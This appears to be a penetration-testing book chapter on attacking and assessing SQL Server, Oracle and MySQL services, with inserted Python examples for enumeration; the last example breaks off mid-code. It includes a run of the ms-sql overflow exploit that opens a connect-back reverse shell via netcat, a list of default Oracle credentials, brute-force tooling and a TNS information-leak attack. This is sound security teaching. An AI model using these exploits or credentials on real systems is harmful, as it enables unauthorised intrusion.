Chapter 9. Assessing Database Services

This chapter focuses on the remote assessment of SQL database services used in most corporate networks to facilitate rapid and effective storage and retrieval of data. If these services aren’t configured or protected correctly at both the application and network levels, they can be used to great effect to compromise networks and sensitive data.

Popular SQL database services that are often found are Microsoft SQL Server, Oracle, and MySQL, accessible through the following network ports:

ms-sql          1433/tcp
ms-sql-ssrs     1434/udp
ms-sql-hidden   2433/tcp
oracle-tns      1521/tcp
oracle-tns-alt  1526/tcp
oracle-tns-alt  1541/tcp
mysql           3306/tcp

Here I discuss the remote enumeration, brute-force password grinding, and process manipulation attacks you can launch to gain access to these popular database services. A useful online resource for database testing and current information is http://www.databasesecurity.com, which also includes useful details relating to less popular database services, including DB2, PostgreSQL, Informix, and Sybase.

Microsoft SQL Server

The Microsoft SQL Server service can be found running by default on TCP port 1433. Sometimes I find that the SQL Server service is run in hidden mode, accessible via TCP port 2433 (yes, this is what Microsoft means by hidden!), or listening on high ports, and used by client software such as Symantec Backup Exec.

The SQL Server Resolution Service (SSRS) was introduced in Microsoft SQL Server 2000 to provide referral services for multiple SQL server instances running on the same machine. The service listens for requests on UDP port 1434 and returns the IP address and port number of the SQL server instance that provides access to the requested database.

Interacting with Microsoft SQL Server

Microsoft SQL Server can use the following transport protocols:

  • TCP/IP (TCP port 1433 or other ports, depending on configuration)

  • Microsoft RPC (using numerous protocol sequences, see Chapter 10)

  • Named pipes (accessible via authenticated SMB sessions, see Chapter 10)

Here I’ll discuss assessment using direct TCP/IP access to the service (through port 1433) and named pipes (through ports 139 and 445), tackling brute-force password grinding and process manipulation vulnerabilities in particular.

SQL Server Enumeration

Two tools that can be used to perform SQL Server enumeration tasks are SQLPing and MetaCoretex, as covered here.

SQLPing

You can use Chip Andrews’ SQLPing Windows command-line utility to enumerate SQL Server details through the SSRS port (UDP 1434). SQLPing is available from http://examples.oreilly.com/networksa/tools/sqlping.zip.

Example 9-1 shows SQLPing in use against a SQL 2000 Server, revealing the server name, database instance name, and clustering information, along with version details and network port/named pipe information.

Example 9-1. Using SQLPing to query a Microsoft SQL Server
D:\SQL> sqlping 192.168.0.51
SQL-Pinging 192.168.0.51
Listening....

ServerName:dbserv
InstanceName:MSSQLSERVER
IsClustered:No
Version:8.00.194
tcp:1433
np:\\dbserv\pipe\sql\query

Tip

Since 2002, Chip Andrews has actively updated SQLPing, and it now has a GUI along with brute force and other features. For further details, please visit http://www.sqlsecurity.com.

Interestingly, even if the SQL Server has been patched using the latest service pack and Microsoft security hotfixes, the version remains at 8.00.194 (when it is actually 8.00.762 if SP3 is installed). Therefore, the exact version number reported through the SSRS shouldn’t be trusted.

For information purposes, Table 9-1 lists SQL versions reported by Microsoft SQL, so that you can enumerate the service pack and patch level of the service.

Table 9-1. SQL Server versions and associated patch levels

Version string          SQL Server version and notes
9.00.2047               SQL Server 2005 SP1
9.00.1399.06            SQL Server 2005
9.00.1314 and earlier   SQL Server 2005 (community previews and beta versions)
8.00.2187               SQL Server 2000 SP4 + hotfix 916287
8.00.2162               SQL Server 2000 SP4 + hotfix 904660
8.00.2151               SQL Server 2000 SP4 + hotfix 903742
8.00.2148               SQL Server 2000 SP4 + various hotfixes
8.00.2040               SQL Server 2000 SP4 + hotfix 899761
8.00.2039               SQL Server 2000 SP4
8.00.760                SQL Server 2000 SP3
8.00.534                SQL Server 2000 SP2
8.00.384                SQL Server 2000 SP1
8.00.194                SQL Server 2000
7.00.1078               SQL Server 7.0 SP4 + security update (Q327068)
7.00.1063               SQL Server 7.0 SP4
7.00.961                SQL Server 7.0 SP3
7.00.842                SQL Server 7.0 SP2
7.00.699                SQL Server 7.0 SP1
7.00.623                SQL Server 7.0

Further discussion of Microsoft SQL Server version numbers and querying can be found in Microsoft KB article 321185 (http://support.microsoft.com/kb/321185).
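As an added example (not code from the book or from SQLPing), the following Python script does what Example 9-1 and Table 9-1 describe in one place: it sends the same one-byte SSRS discovery request SQLPing uses, parses the reply into one record per instance, maps the reported build against the Table 9-1 entries, and flags the caveat that a SQL Server 2000 build of 8.00.194 over SSRS says nothing about the service pack level. The reply bytes are constructed to match Example 9-1; the function names, and the minimum acceptable build of 8.00.2039 (SP4), are assumptions of this example, not anything from the chapter.

```python
"""Added example: SSRS (UDP 1434) instance discovery with a Table 9-1 lookup.
Not part of SQLPing or the book; function names are chosen for this example."""
import socket
from typing import Dict, List, Tuple

# Build strings and descriptions taken from Table 9-1 (subset).
SQL_BUILDS = {
    "9.00.2047": "SQL Server 2005 SP1",
    "9.00.1399.06": "SQL Server 2005",
    "8.00.2187": "SQL Server 2000 SP4 + hotfix 916287",
    "8.00.2039": "SQL Server 2000 SP4",
    "8.00.760": "SQL Server 2000 SP3",
    "8.00.534": "SQL Server 2000 SP2",
    "8.00.384": "SQL Server 2000 SP1",
    "8.00.194": "SQL Server 2000",
    "7.00.1063": "SQL Server 7.0 SP4",
    "7.00.623": "SQL Server 7.0",
}

# Constructed SSRS reply matching Example 9-1: 0x05, a little-endian 16-bit
# length, then "key;value;...;;" for each instance the service advertises.
_BODY = (b"ServerName;dbserv;InstanceName;MSSQLSERVER;IsClustered;No;"
         b"Version;8.00.194;tcp;1433;np;\\\\dbserv\\pipe\\sql\\query;;")
SAMPLE_RESPONSE = b"\x05" + len(_BODY).to_bytes(2, "little") + _BODY


def parse_ssrs_response(data: bytes) -> List[Dict[str, str]]:
    """Split an SSRS server response into one {key: value} dict per instance."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRS response")
    length = int.from_bytes(data[1:3], "little")
    body = data[3:3 + length].decode("ascii", "replace")
    instances = []
    for record in body.split(";;"):
        fields = record.split(";")
        if len(fields) < 2:
            continue  # trailing empty record after the final ";;"
        instances.append({fields[i]: fields[i + 1]
                          for i in range(0, len(fields) - 1, 2)})
    return instances


def version_key(version: str) -> Tuple[int, ...]:
    """'8.00.2039' -> (8, 0, 2039) so builds compare numerically."""
    return tuple(int(part) for part in version.split("."))


def assess_instance(inst: Dict[str, str], minimum: str = "8.00.2039") -> dict:
    """Classify one instance; `minimum` is the oldest build you accept
    (SQL Server 2000 SP4 here, an assumption made for this example)."""
    version = inst.get("Version", "0.0.0")
    return {
        "server": inst.get("ServerName"),
        "instance": inst.get("InstanceName"),
        "version": version,
        "build": SQL_BUILDS.get(version, "unknown build"),
        "tcp": inst.get("tcp"),
        "np": inst.get("np"),
        "below_minimum": version_key(version) < version_key(minimum),
        # SSRS keeps reporting the RTM build 8.00.194 after service packs are
        # applied, so confirm with SELECT @@VERSION over an authenticated session.
        "needs_confirmation": version == "8.00.194",
    }


def query_ssrs(host: str, timeout: float = 2.0) -> List[Dict[str, str]]:
    """Send the one-byte discovery request (0x02) that SQLPing uses to UDP 1434
    and parse the instances the SSRS on `host` advertises."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(b"\x02", (host, 1434))
        data, _ = sock.recvfrom(65535)
    return parse_ssrs_response(data)


if __name__ == "__main__":
    # Offline run against the constructed reply; use query_ssrs(host) for a live inventory.
    for instance in parse_ssrs_response(SAMPLE_RESPONSE):
        print(assess_instance(instance))
```

Run against your own address ranges, the output gives an inventory of instances answering on UDP 1434 (which should normally be none from untrusted networks, per the countermeasures at the end of this chapter); the needs_confirmation flag reminds you that the SSRS build string is not evidence of a missing service pack.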

MetaCoretex

MetaCoretex (http://sourceforge.net/projects/metacoretex/) is a modular database vulnerability scanner written entirely in Java and effective at testing Microsoft SQL Server, Oracle, and MySQL databases. The scanner has a number of Microsoft SQL Server probes. In particular, here are some useful remote tests:

  • SQL Server service pack check

  • Auditing tests to determine which actions are logged

  • Various dangerous stored procedures checks

  • SQL Server brute force

SQL Server Brute Force

ForceSQL and sqlbf are two SQL Server brute-force utilities you can run from the Windows command line; they are available at:

http://examples.oreilly.com/networksa/tools/forcesql.zip
http://examples.oreilly.com/networksa/tools/sqlbf.zip

On the open source Unix-based side of things, the sqldict utility found within the SQL Auditing Tool (SQLAT) toolkit (http://www.cqure.net/wp/?page_id=6) can effectively launch SQL Server brute-force attacks over TCP port 1433.

The sqlbf utility is especially useful because it allows for SQL Server username and password combinations to be guessed through both the TCP/IP (port 1433) and named pipe (port 139 and 445) transports. The tool can be used as follows:

D:\sql> sqlbf

Usage:  sqlbf [ODBC NetLib] [IP List] [User list] [Password List]

               ODBC NetLib : T - TCP/IP, P - Named Pipes (NetBIOS)

The SQL administrator account under Microsoft SQL Server is called sa. Many SQL Server 6.0, 6.5, 7.0, and 2000 installations can be found with no password set; however, SQL Server 2003 and later don’t permit the password to remain blank. SQL Server 6.5 has a second default account named probe used for performance analysis, also with no password.

SQLAT

Patrik Karlsson wrote an excellent toolkit for easily compromising the underlying server upon gaining access to the SQL service, called SQLAT, available at http://www.cqure.net/tools.jsp?id=6.

SQLAT is highly effective and well-developed, restoring the xp_cmdshell stored procedure if it has been removed, and allowing you to upload files, dump registry keys, and access the SAM database.

SQL Server Process Manipulation Vulnerabilities

A number of serious vulnerabilities have been uncovered in Microsoft SQL Server in recent years. Table 9-2 lists remotely and locally exploitable SQL Server vulnerabilities with corresponding MITRE CVE references.

Table 9-2. SQL Server vulnerabilities

CVE reference   Date         Notes
CVE-2004-1560   28/09/2004   SQL Server 7.0 SP3 remote DoS vulnerability and potential arbitrary code execution
CVE-2003-0496   08/07/2003   Windows 2000 SP3 CreateFile( ) privilege escalation vulnerability, locally exploitable via SQL Server using the xp_fileexist stored procedure
CVE-2003-0353   21/08/2003   Microsoft Data Access Components (MDAC) 2.7 SP1 overflow, remotely exploitable through a long broadcast request to the SQL Server resolution service via UDP port 1434
CVE-2003-0232   23/07/2003   SQL Server 7.0, 2000, and MSDE local arbitrary code execution via Local Procedure Calls (LPCs)
CVE-2003-0230   23/07/2003   SQL Server 7.0, 2000, and MSDE named pipe hijacking issue, resulting in local privilege escalation
CVE-2002-1981   03/09/2002   SQL Server 2000 SP2 local configuration modification vulnerability
CVE-2002-1145   16/10/2002   SQL Server 7.0, 2000, and MSDE local privilege escalation vulnerability via xp_runwebtask
CVE-2002-1123   05/08/2002   SQL Server 7.0, 2000, and MSDE remotely exploitable “hello” overflow
CVE-2002-0859   27/05/2002   Microsoft JET engine 4.0 OpenDataSource( ) overflow, locally exploitable via SQL Server 2000 and other vectors
CVE-2002-0649   25/07/2002   Multiple overflows in SQL Server 2000 resolution service, remotely exploitable via requests to UDP port 1434

At the time of this writing, exploits for CVE-2002-1123 (“hello” overflow) and CVE-2002-0649 (0x04 leading-byte overflow) are supported within CORE IMPACT, Immunity CANVAS, and MSF.

GLEG VulnDisco doesn’t cover any Microsoft SQL Server issues at this time, but the Argeniss 0day ultimate exploits pack contains a zero-day, unpatched, DoS exploit for SQL Server 2000, along with a man-in-the-middle NTLM privilege escalation exploit.

SQL resolution service overflow (CVE-2002-0649) demonstration

The SQL resolution service overflow (CVE-2002-0649) can easily be exploited using the standalone ms-sql.exe, available along with source code from the O’Reilly archive at:

http://examples.oreilly.com/networksa/tools/ms-sql.exe
http://examples.oreilly.com/networksa/tools/ms-sql.cpp

Example 9-2 shows the ms-sql exploit usage. The stack overflow creates a connect-back reverse shell from the SQL server back to the user, which is useful if a half-decent firewall policy is in place blocking access to high ports on the server.

Example 9-2. ms-sql exploit usage
D:\SQL> ms-sql
===============================================================
SQL Server UDP Buffer Overflow Remote Exploit
Modified from "Advanced Windows Shellcode"
Code by David Litchfield, [email protected]
Modified by lion, fix a bug.
Welcome to HUC web site http://www.cnhonker.com

Usage:
 sql Target [<NCHost> <NCPort> <SQLSP>]

Exemple:
 C:\> nc -l -p 53
Target is MSSQL SP 0:
 C:\> ms-sql 192.168.0.1 192.168.7.1 53 0
Target is MSSQL SP 1 or 2:
 c:\> ms-sql 192.168.0.1 192.168.7.1 53 1

In my lab environment, I am on 192.168.189.1, attacking a server at 10.0.0.5. I run the exploit as shown in Example 9-3 to send the payload, which results in the server connecting back to me on TCP port 53 with a command prompt.

Example 9-3. Launching the attack through ms-sql
D:\SQL> ms-sql 10.0.0.5 192.168.189.1 53 1
Service Pack 1 or 2.
Import address entry for GetProcAddress @ 0x42ae101C
Packet sent!
If you don't have a shell it didn't work.

At the same time, I set up my Netcat listener on TCP port 53. Upon sending the overflow code to the vulnerable service, an interactive command prompt is spawned from the remote server, as shown in Example 9-4.

Example 9-4. Using Netcat to listen for the connect-back shell
D:\SQL> nc -l -p 53 -v -v
listening on [any] 53 ...
connect to [192.168.189.1] from dbserv [10.0.0.5] 4870
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Oracle

Here I describe user and database enumeration techniques, password grinding, and process manipulation attacks that can be launched against the Oracle database service.

The Transparent Network Substrate (TNS) protocol is used by Oracle clients to connect to database instances via the TNS listener service. This service listens on TCP port 1521 by default (although it is sometimes found on ports 1526 or 1541) and acts as a proxy between database instances and the client system. Figure 9-1 shows an example Oracle web application architecture.

Figure 9-1. Application, listener, and backend Oracle components

TNS Listener Enumeration and Information Leak Attacks

The listener service has its own authentication mechanism and is controlled and administered outside the Oracle database. In its default configuration, the listener service has no authentication set, which allows commands and tasks to be executed outside the database.

tnscmd.pl is an excellent tool you can use to interact with the TNS listener. It’s a Perl script that’s available from http://www.jammed.com/~jwa/hacks/security/tnscmd/.

Pinging the TNS listener

You can use tnscmd.pl to issue various commands to the TNS listener service. Example 9-5 shows the default ping command being issued to the listener to solicit a response.

Example 9-5. Pinging the TNS listener using tnscmd
$ perl tnscmd.pl -h 192.168.189.45
connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=ping))
read
..."..=(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER))
eon

The VSNNUM value is the Oracle version number in decimal; converting it to hex (135294976 is 0x8107000) reveals the version. Figure 9-2 shows the Base Converter application determining the version as 8.1.7.

Figure 9-2. Converting the VSNNUM decimal value to hex

Retrieving Oracle version and platform information

You can issue a version command to the TNS listener using tnscmd.pl, as shown in Example 9-6. In this case, I learn that the server is running Oracle 8.1.7 on Solaris.

Example 9-6. Issuing a version command with tnscmd
$ perl tnscmd.pl version -h 192.168.189.45
connect writing 90 bytes [(CONNECT_DATA=(COMMAND=version))]
.Z.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=version))
read
.M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135294976
)(ERR=0)).b........TNSLSNR.for.Solaris:.Version.8.1.7.0.0.-.Producti
on..TNS.for.Solaris:.Version.8.1.7.0.0.-.Production..Unix.Domain.Soc
ket.IPC.NT.Protocol.Adaptor.for.Solaris:.Version.8.1.7.0.0.-.Develop
ment..Oracle.Bequeath.NT.Protocol.Adapter.for.Solaris:.Version.8.1.7
.0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.Solaris:.Version.8
.1.7.0.0.-.Production,,.........@
eon

Other TNS listener commands

The tnscmd.pl documentation written and maintained by James W. Abendschan at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of TNS listener commands that can be executed remotely using the tool; they are listed in Table 9-3. This is only a summary of the tool and its use—I recommend further investigation of tnscmd.pl if you are interested in Oracle security.

Table 9-3. Useful TNS listener commands

Command       Notes
ping          Pings the listener
version       Provides output of the listener version and platform information
status        Returns the current status and variables used by the listener
debug         Dumps debugging information to the listener log
reload        Reloads the listener config file
services      Dumps service data
save_config   Writes the listener config file to a backup location
stop          Shuts down the listener

Retrieving the current status of the TNS listener

You can send a status command to the listener that returns a number of useful pieces of information. Example 9-7 shows this command being issued.

Example 9-7. Issuing a status command with tnscmd
$ perl tnscmd.pl status -h 192.168.189.46
connect writing 89 bytes [(CONNECT_DATA=(COMMAND=status))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=status))
writing 89 bytes
read
........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR
.........6.........'.............j........(DESCRIPTION=(TMP=)(VSNNUM
=135290880)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for
.Solaris:.Version.8.1.6.0.0.-.Production)(START_DATE=01-SEP-2000.18:
35:49)(SIDNUM=1)(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/l
istener.log)(PRMFILE=/u01/app/oracle/product/8.1.6/network/admin/lis

The SECURITY=OFF setting within the information returned tells me that the TNS listener is set with no authentication and thus allows anonymous remote attackers to launch attacks with relative ease. It also retrieves LOGFILE details and many other variables that have been stripped for brevity.
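Both the VSNNUM conversion behind Figure 9-2 and the reading of SECURITY=OFF out of a status reply can be automated. The following Python, added here and not part of tnscmd.pl or the book, parses the listener's parenthesised key=value replies, unpacks VSNNUM into a dotted version, and lists the findings a reviewer would record from a status reply. The two sample replies are reconstructed from Examples 9-5 and 9-7 with the framing bytes and "." placeholders removed (the truncated PRMFILE entry is left out); parse_nv, decode_vsnnum and assess_listener are names chosen for this example, and the 10g value 169869568 shows that the decoding generalises beyond the 8i values on this page.

```python
"""Added example: parse TNS listener replies, decode VSNNUM, and flag an
unauthenticated listener.  Not part of tnscmd.pl or the book."""
from typing import Any, Dict, List, Tuple

# Reconstructed from Example 9-5 and Example 9-7 (framing bytes removed and
# the '.' placeholders of the book's dump restored to spaces).
PING_REPLY = "(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER))"
STATUS_REPLY = (
    "(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER)"
    "(SECURITY=OFF)(VERSION=TNSLSNR for Solaris: Version 8.1.6.0.0 - Production)"
    "(START_DATE=01-SEP-2000 18:35:49)(SIDNUM=1)"
    "(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log))"
)


def parse_nv(text: str, pos: int = 0) -> Tuple[str, Any, int]:
    """Parse one '(KEY=VALUE)' node starting at text[pos].  VALUE is either a
    plain string or a dict of nested nodes.  Returns (key, value, next_pos)."""
    if text[pos] != "(":
        raise ValueError("expected '(' at offset %d" % pos)
    eq = text.index("=", pos)
    key = text[pos + 1:eq]
    pos = eq + 1
    if pos < len(text) and text[pos] == "(":
        children = {}
        while pos < len(text) and text[pos] == "(":
            child_key, child_value, pos = parse_nv(text, pos)
            children[child_key] = child_value
        if pos >= len(text) or text[pos] != ")":
            raise ValueError("expected ')' at offset %d" % pos)
        return key, children, pos + 1
    end = text.index(")", pos)
    return key, text[pos:end], end + 1


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM packs the version into a 32-bit integer: major in the top byte,
    then minor (4 bits), maintenance (8 bits), port (4 bits) and patch (8 bits).
    135294976 == 0x8107000 -> '8.1.7.0.0'; 169869568 == 0xA200100 -> '10.2.0.1.0'."""
    parts = (vsnnum >> 24, (vsnnum >> 20) & 0xF, (vsnnum >> 12) & 0xFF,
             (vsnnum >> 8) & 0xF, vsnnum & 0xFF)
    return ".".join(str(p) for p in parts)


def assess_listener(reply: str) -> Dict[str, Any]:
    """Turn a ping or status reply into a version plus the findings to record."""
    _, desc, _ = parse_nv(reply.strip())
    findings: List[str] = []
    security = desc.get("SECURITY")
    if security is None:
        findings.append("SECURITY not reported; issue a status command")
    elif security.upper() == "OFF":
        findings.append("no listener password set (SECURITY=OFF)")
    if "LOGFILE" in desc:
        findings.append("listener discloses file paths to unauthenticated clients")
    return {
        "alias": desc.get("ALIAS"),
        "version": decode_vsnnum(int(desc["VSNNUM"])),
        "platform": desc.get("VERSION"),
        "findings": findings,
    }


if __name__ == "__main__":
    print(assess_listener(PING_REPLY))
    print(assess_listener(STATUS_REPLY))
```

The fix for the SECURITY=OFF finding is to set a listener password (lsnrctl's change_password/set password) and, on releases that support it, ADMIN_RESTRICTIONS_LISTENER = ON in listener.ora, so that the remote commands in Table 9-3 can no longer be issued anonymously; re-running assess_listener against a fresh status reply then verifies the change.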

Executing an information leak attack

An interesting vulnerability, publicly reported by ISS X-Force in October 2000 and also found by James W. Abendschan, occurs when the cmdsize variable of a given TNS listener command request is falsified.

In Example 9-8, I send a standard 87-byte ping request to the listener, but report the cmdsize as being 256 bytes in total. The TNS listener responds with over 380 bytes of data, containing hostname, SQL usernames, and other active session information. If I execute this same attack multiple times on a busy server, I will compromise most of the database usernames. The SQL*Net login process is handled by a child process, and so this memory leak issue doesn’t reveal passwords.

Example 9-8. User details can be harvested by providing a false cmdsize
$ perl tnscmd.pl -h 192.168.189.44 --cmdsize 256
Faking command length to 256 bytes
connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=ping))
read
........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR
_STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=(COMMAND=ping)
)OL=TCP)(HOST=oraclesvr)(PORT=1541))(CONNECT_DATA=(SERVICE_NAME=pr01
)(CID=(PROGRAM=)(HOST=oraclesvr)(USER=oracle))))HOST=TOM)(USER=tom))
))ORANTBINifrun60.EXE)(HOST=ENGINEERING-1)(USER=Rick))))im6IM60.
EXE)(HOST=RICK)(U'))(ERROR=(CODE=303)(EMFI=1))))
eon

TNS Listener Process Manipulation Vulnerabilities

Several serious remote vulnerabilities are present in default TNS listener configurations (i.e., with no authentication set), as listed in Table 9-4. Many locally exploitable privilege escalation issues exist within Oracle itself (which require authenticated access through the TNS listener to a valid database); these are discussed in the following section.

Table 9-4. Remotely exploitable TNS listener vulnerabilities

CVE name        Date         Notes
CVE-2004-1364   23/12/2004   Oracle 10.1.0.2, 9.2.0.5, and 8.1.7.4 ExtProc library directory traversal bug
CVE-2004-1363   23/12/2004   Oracle 10.1.0.2, 9.2.0.5, and 8.1.7.4 ExtProc environment variable overflow
CVE-2003-0095   11/02/2003   Oracle 9.2 and 8.1.7 username overflow
CVE-2002-0965   12/06/2002   Oracle 9.0.1 SERVICE_NAME stack overflow
CVE-2002-0857   14/08/2002   Oracle 9.2 and 8.1.7 listener control utility (LSNRCTL) format string bug
CVE-2002-0567   06/02/2002   Oracle 9.0.1 and 8.1.7 ExtProc command execution vulnerability
CVE-2001-0499   27/06/2002   Oracle 8.1.7 COMMAND stack overflow
CVE-2000-0818   25/10/2000   Oracle 8.1.6 LOG_FILE command arbitrary file creation bug

Tip

Two useful web sites that provide current information relating to pre- and post-authentication Oracle vulnerabilities are http://www.red-database-security.com and http://www.databasesecurity.com/oracle.htm. The Red-Database-Security site has a very large number of upcoming and published advisories relating to post-authentication issues (mainly SQL injection and privilege escalation bugs).

CORE IMPACT supports CVE-2003-0095 (Oracle 9.2 and 8.1.7 username overflow) and CVE-2001-0499 (Oracle 8.1.7 TNS listener COMMAND stack overflow). Immunity CANVAS only supports CVE-2001-0499 at this time, and MSF has no support for Oracle Database Server issues exploitable through the TNS listener.

The Argeniss ultimate 0day exploits pack for Immunity CANVAS includes a large number of Oracle Database Server exploit scripts (of which a number are zero-day and unpatched), which result in local privilege escalation and DoS conditions in particular.

Oracle Brute-Force and Post-Authentication Issues

If you can communicate freely with the TNS Listener, you can attempt to connect to and authenticate with backend database instances. Oracle client utilities such as sqlplus, or open source equivalents such as Yet Another SQL*Plus Replacement (YASQL, available from http://sourceforge.net/projects/yasql/), can easily be fed SQL username and password combinations from a shell script or similar process. Some products, such as NGSSquirreL (http://www.nextgenss.com/products/), can do this effectively on the commercial side. Table 9-5 contains a list of default, preinstalled Oracle database users and their passwords.

Table 9-5. Default Oracle database accounts

Username     Password
ADAMS        WOOD
BLAKE        PAPER
CLARK        CLOTH
CTXSYS       CTXSYS
DBSNMP       DBSNMP
DEMO         DEMO
JONES        STEEL
MDSYS        MDSYS
MTSSYS       MTSSYS
ORDPLUGINS   ORDPLUGINS
ORDSYS       ORDSYS
OUTLN        OUTLN
SCOTT        TIGER
SYS          CHANGE_ON_INSTALL
SYSTEM       MANAGER

Phenoelit’s excellent Default Password List (DPL) contains a number of other common Oracle passwords, and is accessible at http://www.phenoelit.de/dpl/dpl.html.

If you are going to brute-force Oracle user passwords and compromise database instances, you need a decent understanding of the SQL*Plus client to navigate around the database and do anything productive.

OAT

For novices wishing to abuse default Oracle passwords to gain underlying system access, the Oracle Auditing Tools (OAT) package is available for Windows platforms at http://www.cqure.net/tools.jsp?id=7.

In particular, the OAT toolkit contains simple scripts you can use to execute commands, upload and download files via TFTP, and dump the SAM database of Windows-based Oracle servers.

MetaCoretex

As mentioned earlier in this chapter, MetaCoretex (http://sourceforge.net/projects/metacoretex/) is a Java database vulnerability scanner with a number of pre- and post-authentication Oracle probes. In particular, some useful remote tests are:

  • TCP bounce port scanning through the Oracle database using UTL_TCP

  • Oracle database SID enumeration

  • TNS security settings and status

Post-authentication Oracle database vulnerabilities and exploits

Upon authenticating with a valid database SID through the TNS listener, there are many local privilege escalation and overflow issues within Oracle. A handful of recent locally exploitable bugs, as listed in MITRE CVE, are given in Table 9-6. Many issues in the CVE list have insufficient information (as Oracle released patches without providing adequate details), and so it is difficult to put together a meaningful list of bugs. I have assembled this list by cross-referencing the Oracle exploit scripts available through milw0rm (http://www.milw0rm.com) with ISS X-Force (http://xforce.iss.net), MITRE CVE (http://cve.mitre.org), and the Oracle security center (http://www.oracle.com/technology/deploy/security/index.html).

Table 9-6. Post-authentication Oracle database vulnerabilities

CVE reference   Fixed in CPU   Milw0rm exploit(s)   Notes
CVE-2007-1442   04/2007        3451                 Oracle 10.2.0.2 NULL pDacl parameter privilege escalation vulnerability
CVE-2006-5335   10/2006        3177                 Oracle 10.2.0.2 BUMP_SEQUENCE SQL injection bug
CVE-2006-3702   07/2006        3269                 Oracle 10.2.0.2 and 9.2.0.7 DBMS_EXPORT_EXTENSION SQL injection bug
CVE-2006-3698   07/2006        3375 and 3358        Oracle 10.1.0.5 KUPW$WORKER.MAIN SQL injection vulnerability
CVE-2006-2505   07/2006        1719                 Oracle 10.2.0.2, 9.2.07, and 8.1.7.4 DBMS_EXPORT_EXTENSION local command execution bug
CVE-2006-0272   01/2006        1455                 Oracle 10.1.0.4 and 9.2.0.7 DBMS_XMLSCHEMA overflows
CVE-2006-0586   01/2006        3359 and 3376        Oracle 10.1.0.3 KUPV$FT.ATTACH_JOB vulnerability
CVE-2006-0547   01/2006        N/A                  Oracle 10.1.0.4.2, 9.2.0.7, and 8.1.7.4 AUTH_ALTER_SESSION privilege escalation bug
CVE-2006-0260   01/2006        3363 and 3377        Oracle 10.1.0.5 and 9.2.0.7 DBMS_METADATA SQL injection exploit
CVE-2005-4832   04/2005        3378 and 3364        Oracle 10.1.0.4 and 9.2.0.5 DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE SQL injection vulnerabilities
CVE-2005-0701   04/2005        2959                 Oracle 9.2 and 8.1.7 UTL_FILE functions allow arbitrary files to be read or written
CVE-2004-1774   08/2004        932                  Oracle 10.1.0.2 SDO_CODE_SIZE overflow via long LAYER parameter
CVE-2004-1371   08/2004        N/A                  Oracle 10.1.0.2, 9.2.0.5, and 8.1.7 PL/SQL “wrapped procedure” overflow
CVE-2004-1364   08/2004        2951                 Oracle 9i / 10g ExtProc command execution

The milw0rm exploits listed in Table 9-6 are available from the site using a URL such as http://www.milw0rm.com/exploits/932, and they are zipped and available from the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/milw0rm_oracle.zip. Oracle Critical Patch Update (CPU) details are available from the Oracle security center at http://www.oracle.com/technology/deploy/security/alerts.htm.

A recommended book specializing in Oracle security testing and countermeasures is The Oracle Hacker’s Handbook by David Litchfield (Wiley, 2007), which contains detailed information relating to Oracle database testing. A useful and recent PDF documenting Oracle issues and hardening strategies is available from http://www.red-database-security.com/wp/hacking_and_hardening_oracle_xe.pdf.

Oracle XDB Services

If the Oracle XDB FTP and HTTP services are accessible on TCP ports 2100 and 8080, respectively, CORE IMPACT and MSF can be used to launch attacks against the services, resulting in arbitrary command execution. The issue is listed in CVE as CVE-2003-0727, and the relevant MSF modules are:

http://framework.metasploit.com/exploits/view/?refname=windows:http:oracle9i_xdb_pass
http://framework.metasploit.com/exploits/view/?refname=windows:ftp:oracle9i_xdb_ftp_pass
http://framework.metasploit.com/exploits/view/?refname=windows:ftp:oracle9i_xdb_ftp_unlock

MySQL

MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable Oracle.

MySQL Enumeration

The version of the target MySQL database can be easily gleaned simply by using Netcat or Telnet to connect to port 3306 and analyzing the string received, as shown here:

$ telnet 10.0.0.8 3306
Trying 10.0.0.8...
Connected to 10.0.0.8.
Escape character is '^]'.
(
3.23.52D~n.7i.G,
Connection closed by foreign host.

The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of client systems defined, you will see a response like this:

$ telnet db.example.org 3306
Trying 192.168.189.14...
Connected to db.example.org.
Escape character is '^]'.
PHost 'cyberforce.segfault.net' is not allowed to connect to this MySQL server
Connection closed by foreign host.
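The two telnet transcripts above are the first packet MySQL sends: three length bytes, a sequence byte, and then either a handshake (protocol byte 0x0a, which prints as the stray newline, followed by the NUL-terminated server version) or an error packet (0xff, a two-byte error code, then the message). The "(" and "P" that lead the two transcripts are the length bytes 0x28 and 0x50 of exactly those two packets. As an added example, not code from the book or from any MySQL tool, here is a Python decoder for both shapes, with sample packets constructed to reproduce the transcripts; parse_mysql_greeting, version_tuple and grab_greeting are names chosen for this example.

```python
"""Added example: decode the first packet a MySQL server sends on TCP 3306.
Not part of the book or of any MySQL tool; names are chosen for this example."""
import socket
from typing import Dict, Tuple

# Constructed 3.23-style handshake: a 40-byte payload, so the length byte 0x28
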